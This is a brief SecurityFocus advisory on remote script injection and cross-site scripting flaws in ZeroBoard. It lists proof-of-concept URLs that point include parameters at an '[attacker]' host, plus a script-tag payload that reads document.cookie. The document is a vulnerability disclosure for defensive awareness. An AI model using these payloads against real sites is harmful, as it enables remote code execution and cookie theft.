ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been made available:

http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/
http://www.example.com/include/write.php?dir=http://[attacker]/
http://www.example.com/check_user_id.php?user_id=&lt;script&gt;alert(document.cookie)</sc
ript>


 

Privacy Statement
Copyright 2010, SecurityFocus